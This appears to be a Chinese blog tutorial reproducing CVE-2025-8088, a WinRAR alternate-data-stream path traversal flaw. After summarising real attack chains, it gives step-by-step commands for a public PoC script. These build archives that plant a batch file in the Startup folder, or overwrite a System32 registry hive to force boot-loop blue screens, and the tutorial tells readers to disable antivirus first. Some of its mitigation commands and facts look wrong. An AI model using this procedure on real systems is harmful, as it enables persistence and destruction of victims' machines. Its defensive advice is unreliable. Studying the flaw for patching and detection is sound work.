【漏洞復現】CVE-2025-8088｜WinRAR 路徑穿越漏洞：從原理到藍屏攻擊全流程

前言

在這里插入圖片描述

WinRAR 作為 Windows 平臺最常用的壓縮管理工具之一，幾乎是每臺電腦的 “標配軟件”。但在 2025 年 8 月，一款影響范圍覆蓋 WinRAR 0 至 7.12 全版本的高危漏洞（CVE-2025-8088）被披露 —— 這是一個典型的目錄遍歷漏洞，攻擊者可利用 Windows NTFS 文件系統的 “備用數據流（ADS）” 特性，制作惡意壓縮包，繞過 WinRAR 的路徑限制，將惡意文件靜默解壓到系統關鍵目錄（如啟動項、系統配置目錄），進而實現遠程控制、數據竊取，甚至觸發系統藍屏循環。

更嚴峻的是，安全廠商 ESET 已發現黑客組織（如 RomCom）通過 “釣魚郵件 + 惡意 RAR 附件” 的方式在野利用該漏洞，普通用戶稍有不慎就可能中招。本文將從漏洞原理、攻擊鏈拆解、環境準備到完整復現（含啟動項植入與藍屏測試），帶大家一步步掌握該漏洞的核心細節，同時強調合法測試與安全防護的重要性。

一、漏洞基礎信息

為快速建立對漏洞的整體認知，先梳理核心基礎信息：

項目	說明
漏洞名稱	WinRAR 目錄穿越漏洞（路徑限制繞過）
漏洞編號	CVE-2025-8088
漏洞類型	目錄遍歷（Path Traversal）
CVSS 3.1 評分	8.4（高危，CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H）
公開時間	2025-08-08
受影響范圍	Windows 版 WinRAR（0~7.12 全版本）、UnRAR.dll、RAR/UnRAR 組件
不受影響范圍	Unix 版 RAR/UnRAR、Android 版 RAR
在野利用狀態	已發現（RomCom 組織通過釣魚郵件利用）
核心危害	突破解壓目錄限制，靜默釋放惡意文件至啟動項 / 系統目錄，導致遠程控制、藍屏等

二、漏洞原理深度剖析

要復現漏洞，必須先理解其 “兩大核心依賴”：NTFS 備用數據流（ADS） 與 WinRAR 路徑解析缺陷。

2.1 關鍵前提：NTFS 備用數據流（ADS）

ADS（Alternate Data Streams，備用數據流）是 NTFS 文件系統的特有特性，允許在一個 “主文件” 中附加多個 “隱藏數據流”，這些數據流不影響主文件的正常使用，普通用戶難以察覺。

核心特點：
1. ADS 無法獨立存在，必須依附于一個已存在的 “主文件”（如 txt、jpg 文件）。
2. 主文件與 ADS 共享文件名和文件系統條目（MFT），但存儲不同數據。
3. 普通工具（如記事本、資源管理器）僅能查看主文件內容，ADS 內容需通過特殊命令（如 more、dir /r）查看。

直觀示例：
在 Windows 命令提示符（CMD）中執行以下命令，創建一個帶 ADS 的文件：

在這里插入圖片描述

# 1. 創建主文件 a.txt（內容為空）
type nul > a.txt
# 2. 向 a.txt 附加 ADS 流（流名為 b.bat，內容為 "calc.exe"，即打開計算器）
echo calc.exe > a.txt:b.bat
# 3. 查看主文件 a.txt：顯示為空（ADS 未被識別）
notepad a.txt
# 4. 查看 ADS 內容：需用 more 命令，能看到 "calc.exe"
more < a.txt:b.bat
# 5. 用 dir /r 查看文件詳情：能看到 a.txt 后附帶了 ":b.bat:$DATA"（ADS 標識）
dir /r a.txt

2.2 漏洞核心：WinRAR 的路徑解析缺陷

WinRAR 7.12 及以下版本在處理 “含 ADS 流的壓縮包” 時，存在路徑遍歷漏洞：

在這里插入圖片描述

當壓縮包中的 ADS 流名稱包含 ../（路徑穿越符）時，WinRAR 會錯誤地將其解析為 “目錄跳轉指令”，而非普通字符。
正常情況下，WinRAR 會將解壓文件限制在用戶指定的目錄內；但該漏洞允許攻擊者通過構造 ADS 流名稱（如 :../Startup/malicious.bat），讓 WinRAR 把 ADS 流作為 “獨立文件” 釋放到目標路徑（如系統啟動目錄）。

簡單來說：攻擊者通過 ADS 隱藏惡意文件，再利用 WinRAR 的解析缺陷 “跳出” 解壓目錄，將惡意文件投遞到系統關鍵位置，實現 “靜默攻擊”。

三、真實攻擊鏈拆解（RomCom 組織案例）

安全廠商 ESET 披露，黑客組織 RomCom 已將 CVE-2025-8088 用于實際攻擊，核心攻擊鏈為 “釣魚郵件→惡意 RAR 附件→ADS 隱藏惡意文件→啟動項植入→惡意程序執行”，具體分為三種典型攻擊路徑：

攻擊鏈名稱	入口文件（.ink 快捷方式）	核心執行流程	最終目的
Mythic Agent	Update.ink	1. 快捷方式調用偽裝成 Edge 瀏覽器的 msedge.dll 2. DLL 解密 AES 加密的 Shellcode 3. 啟動 Mythic Agent 木馬	建立 C2 通信，遠程控制目標機
SnipBot	Display Settings.ink	1. 快捷方式運行修改版 PuTTY（ApbxHelper.exe） 2. 檢查目標機最近打開的文檔數量 3. 解密 Shellcode 并下載額外 Payload	竊取文檔數據，投放更多惡意軟件
MeltingClaw	Settings.ink	1. 快捷方式啟動 Complaint.exe 2. 從攻擊者服務器下載 MeltingClaw DLL 3. DLL 加載更多惡意模塊	系統持久化，竊取敏感信息

可見，該漏洞的攻擊隱蔽性極強 —— 用戶看到的只是 “正常文檔”（如 1.txt），但解壓時惡意文件已通過 ADS 流悄悄植入啟動項，下次開機即自動執行。

三大實戰攻擊鏈細節

ESET已捕獲該漏洞的三種典型攻擊鏈，均以Windows快捷方式（LNK文件，此前提及的.ink文件為LNK文件的常見類型） 為核心引導載體，具體流程補充如下：

1. 攻擊鏈1：Mythic Agent（遠程控制）

惡意文件：Update.ink（LNK快捷方式）；
執行流程：Update.ink → 引導加載msedge.dll（偽裝微軟Edge組件） → 寫入COM劫持注冊表 → 解密并執行Shellcode → 啟動Mythic Agent（C2客戶端）；
核心功能：實現C2通信、遠程命令執行、后續Payload投遞（如植入其他惡意軟件）。

2. 攻擊鏈2：SnipBot（數據竊取）

惡意文件：Display Settings.ink（LNK快捷方式，偽裝“顯示設置”）；
執行流程：Display Settings.ink → 引導加載ApbxHelper.exe（修改版PuTTY） → 檢查用戶最近打開的文檔數量（規避檢測） → 解密并執行Shellcode → 從攻擊者服務器下載額外Payload；
核心功能：竊取用戶文檔、瀏覽器記錄等數據。

3. 攻擊鏈3：MeltingClaw（惡意模塊加載）

惡意文件：Settings.ink（LNK快捷方式，偽裝“系統設置”）；
執行流程：Settings.ink → 引導加載Complaint.exe → 解密并執行Shellcode → 下載MeltingClaw DLL文件 → 從攻擊者服務器獲取更多惡意模塊（如挖礦、勒索組件）；
核心功能：加載多樣化惡意模塊，擴大攻擊影響。

四、復現環境準備

4.1 環境清單

本次復現分為 “基礎測試（啟動項植入）” 和 “進階測試（藍屏攻擊）”，需準備以下環境：

環境類型	具體配置	說明
操作系統	Windows 10/11 專業版（建議虛擬機，如 VMware Workstation）	物理機測試有風險，虛擬機方便快照恢復
WinRAR 版本	WinRAR 7.12 （32/64 位均可）	需安裝在目標 Windows 系統中，官網舊版本可從第三方可信渠道獲取（如 FileHorse）
攻擊工具	Python 3.8+、CVE-2025-8088 POC 腳本、WinRAR 自帶的 rar.exe	Python 用于運行 POC 生成惡意壓縮包；rar.exe 需從 WinRAR 安裝目錄提取
輔助工具	系統快照工具（VMware 快照）	進階測試（藍屏）會導致系統損壞，快照用于快速恢復

4.2 環境預處理（必做！）

關閉安全軟件：臨時退出 360、火絨、Windows Defender 等，避免攔截 POC 腳本或惡意壓縮包。
創建系統快照：在 VMware 中對 Windows 虛擬機創建快照（“虛擬機→快照→拍攝快照”），后續藍屏測試后可通過快照恢復系統。
提取 rar.exe：打開 WinRAR 安裝目錄（默認路徑：C:\Program Files\WinRAR），找到 rar.exe，記錄其路徑（如 C:\Program Files\WinRAR\rar.exe），后續 POC 腳本需用到。
下載 POC 腳本：從 GitHub 倉庫獲取POC（地址：sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-），將腳本保存到 Windows 系統的 D:\POC 目錄。

五、漏洞復現核心步驟

本次復現分為兩部分：基礎復現（生成惡意壓縮包，解壓到啟動項） 和 進階復現（生成藍屏壓縮包，觸發系統藍屏）。

5.1 基礎復現：惡意文件植入系統啟動項

目標

生成一個惡意 RAR 壓縮包，用戶解壓時，將 a.bat（惡意腳本，此處以打開計算器為例）靜默釋放到系統啟動目錄（C:\Users\[用戶名]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup），下次開機自動執行。

步驟 1：準備 “誘餌文件” 與 “惡意 payload”

在 D:\POC 目錄下創建 “誘餌文件”1.txt（用于迷惑用戶，內容可任意，如 “這是工作文檔.txt”）。
在D:\POC目錄下創建 “惡意 payload”a.bat，內容為打開計算器（測試用，實際攻擊中可替換為木馬）：
```
@echo off
calc.exe  # 打開計算器，測試用
exit
```

步驟 2：運行 POC 腳本生成惡意壓縮包

打開 Windows 命令提示符（CMD），切換到 POC 腳本所在目錄：
```
cd /d D:\POC
```
執行 POC 腳本，生成惡意 RAR 壓縮包，命令格式如下：
```
python poc.py --decoy 1.txt --payload a.bat --drop "C:\Users\bbb22666\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" --rar "C:\Program Files\WinRAR\rar.exe"
```
- 命令參數解釋：
  - --decoy 1.txt：指定誘餌文件（用戶可見的正常文件）。
  - --payload a.bat：指定惡意 payload（要植入的惡意文件）。
  - --drop "目標路徑"：指定惡意文件的釋放路徑（此處為當前用戶的啟動目錄，需將 bbb22666 替換為你的 Windows 用戶名）。
  - --rar "rar.exe 路徑"：指定 WinRAR 安裝目錄下的 rar.exe 路徑。
腳本執行成功后，會在 D:\POC 目錄下生成一個惡意 RAR 壓縮包（如 malicious.rar）表示生成成功。

在這里插入圖片描述

步驟 3：驗證惡意壓縮包（解壓測試）

右鍵點擊 malicious.rar，選擇 “解壓到當前文件夾”（WinRAR 7.12 會自動執行解壓）。
解壓后，當前目錄會顯示1.txt（誘餌文件），看似正常；但此時惡意文件a.bat已被靜默釋放到啟動目錄：
- 打開啟動目錄：C:\Users\bbb22666\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup，可看到 a.bat 已存在。

步驟 4：驗證啟動項效果

重啟 Windows 虛擬機，開機后會自動彈出計算器（a.bat 執行結果），說明惡意文件已成功通過啟動項自動運行。

5.2 進階復現：生成藍屏壓縮包（謹慎操作！）

原理

Windows 系統在 C:\Windows\System32\config 目錄下存在 OSDATA 文件（Xbox 相關注冊表配置文件），若該文件被替換為空白文件，系統會誤認為注冊表損壞，觸發藍屏并循環重啟。利用 CVE-2025-8088 可將空白 OSDATA 文件解壓到該目錄，實現藍屏攻擊。

步驟 1：準備 “藍屏 payload”

在D:\POC目錄下創建空白的OSDATA文件（無后綴名）：

type nul > D:\POC\OSDATA

準備誘餌文件 OSDATA.txt（內容任意，如 “系統配置備份.txt”），放在 D:\POC 目錄下。

步驟 2：運行 POC 生成藍屏壓縮包

執行以下命令，生成可觸發藍屏的惡意 RAR 壓縮包：

cd /d D:\POC
python poc.py --decoy OSDATA.txt --payload OSDATA --drop "C:\Windows\System32\config" --rar "C:\Program Files\WinRAR\rar.exe"

參數解釋：--drop 指定為系統配置目錄 C:\Windows\System32\config，--payload 為空白 OSDATA 文件。

步驟 3：解壓測試與藍屏驗證

右鍵點擊生成的藍屏壓縮包（如 blue_screen.rar），選擇 “解壓到當前文件夾”。
解壓完成后，空白 OSDATA 文件已替換 C:\Windows\System32\config\OSDATA（系統原文件被覆蓋）。
重啟 Windows 虛擬機，系統會在開機時觸發藍屏（藍屏代碼通常為 REGISTRY_ERROR），且重啟后會循環藍屏，驗證漏洞攻擊效果。
恢復系統：關閉虛擬機，通過之前創建的快照恢復系統（“虛擬機→快照→恢復到上一個快照”），避免系統無法使用。

六、漏洞危害與防護建議

6.1 漏洞核心危害

隱蔽性極強：惡意文件通過 ADS 隱藏在正常文件中，用戶無法通過常規方式察覺。
無需交互：僅需用戶解壓壓縮包，無需點擊額外文件，攻擊門檻極低。
危害范圍廣：可覆蓋系統文件、植入啟動項、觸發藍屏，甚至完全控制目標機。

6.2 緊急防護措施

立即更新 WinRAR：這是最根本的防護手段！前往 WinRAR 官網（https://www.winrar.com.cn/）下載并安裝 7.13 及以上版本，官方已修復該漏洞。

禁用 NTFS ADS 特性：通過組策略或命令禁用 ADS（適合企業環境），命令如下：

fsutil behavior set disable8dot3 1  # 禁用短文件名，間接限制 ADS 濫用
fsutil behavior set streams 1  # 禁用 ADS（部分系統支持）

謹慎解壓未知壓縮包：不打開來歷不明的釣魚郵件附件、論壇下載的 RAR 壓縮包；解壓前用殺毒軟件掃描。
監控系統關鍵目錄：定期檢查啟動目錄（Startup）、系統配置目錄（C:\Windows\System32\config），發現異常文件及時刪除。
開啟安全軟件實時防護：主流殺毒軟件（如 360、火絨）已更新對該漏洞利用的檢測規則，確保實時防護開啟。